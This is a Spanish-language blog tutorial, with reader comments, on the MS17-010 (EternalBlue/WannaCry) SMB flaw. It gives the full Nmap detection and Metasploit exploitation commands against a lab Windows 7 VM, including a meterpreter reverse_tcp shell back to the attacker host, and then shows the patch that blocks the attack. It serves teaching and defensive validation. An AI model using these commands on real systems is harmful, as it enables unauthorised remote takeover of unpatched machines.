Explotando Vulnerabilidad MS17-010 o WannaCry
El pasado 12 de Mayo durante el desarrollo del Peruhack en Lima-Perú estallaba la noticia de un ataque global del ahora famoso ramsomware «Wanacry» arrasando múltiples empresas, grandes y extra grandes.
La duda es, como funciona Wanacry ?
El punto de entrada inicial no era muy diferente a los ramsomware que han aparecido anteriormente y se trata de infección via corre electrónico atraves de adjuntos con malware que explotaba una vulnerabilidad hasta esa fecha «no tan conocida» luego se expandía por la redes colindantes explotando la misma vulnerabilidad.
Ello es en resumen, técnicamente hablando , la vulnerabilidad que explotada por el ransomware WanaCrypt0r o WanaCry es la denominada por el boletin oficial de Microsoft como MS17-010 la cual afecta primordialmente a Windows 7 y Windows 2008 server que fue remediada por Microsoft el 14 de marzo es decir existe un parche desde esa fecha. El tema es que existe una herramienta llamada «EternalBlue» liberada por ShadowBrokers ( un grupo de hackers involucrados en el hackeo a la NSA) la cual explota la vulnerabilidad y afecta al protocolo SMB ( Servicio para compartir archivos e impresoras) que ahora está portada a Mestasploit por Elevenpaths.
Es por ello que su propagación fue masiva debido a que basta que una sola maquina se infecte para que se propague en toda una red LAN.
A continuación vamos a hacer una prueba de concepto paso a paso de como se explota la vulnerabilidad y luego aplicaremos el parche y probaremos nuevamente.
Escenario
Atacante : Kali Linux 2016_1 / IP 192.168.56.102
Atacado : Windows 7 64Bits / IP 192.168.56.101
1- Detección de Vulnerabilidad MS17-010 (Wanacry) con Nmap
cd /usr/share/nmap/scripts
wget https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
nmap -d -sC -p445 –script smb-vuln-ms17-010.nse 192.168.56.101
Como se puede ver el scrip de nmap nos indica que el sistema operativo es vulnerable a ms17-010 ,con la confirmación vamos a explotar.
2- Explotando la Vulnerabilidad MS17-010 (Wanacry) con Metasploit
2.1- Instalación del exploit Eternalblue-Doublepulsar en Metasploit
cd /root
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
2.2..- Atacando Windows 7 64Bits vulnerable
msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
show info
show targets
set TARGET 8
set PAYLOAD windows/meterpreter/reverse_tcp
set PROCESSINJECT explorer.exe
set LHOST 192.168.56.102
set LPORT 4444
set RHOST 192.168.56.101
exploit
Como vemos se genera la sesión de Meterpreter
2.1- Aplicando Parche y Probando que la vulnerabilidad
2.1- Aplicando Parche UPDATE de seguridad para MS17-010
Descargamos la actualización oficial desde :
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212
Aplicamos el parche
2.2- Validando que la vulnerabilidad fue parchada
Validando con Nmap
Validando nuevamente con Metasploit
Como vemos luego de a ver aplicado el parche ya no es posible tomar el control del sistema, asi que a realizar las actualizaciones antes que se infecten.
Saludos
Juan Oliva
@jroliva
Juan Oliva 
Estimado juan
Nesecito hacer una consulta por interno me puede dar su contacto
Hola puedes ubicarme en el email : jroliva@gmail.com
Saludos
Juan Oliva
Muy buenas, queria saber si con que el antivirus lo neutralice es suficiente, ya que presente todos los sintomas q describen arriba, instale un antivirus y logro encontrarlo y eliminarlo y se acabaron los problemas pero tengo esa duda
No lo consultes lol… este tipo es un lamer. Jajaja solo revisa su wordpress.
Sorry es que este lammer se fue de vacaciones al caribe 😀 !!!
La respuesta es NO, tienes que aplicar el parch de $MS necesariamente ya que si el antivirus falla quedas expuesto.
Saludos
Juan Oliva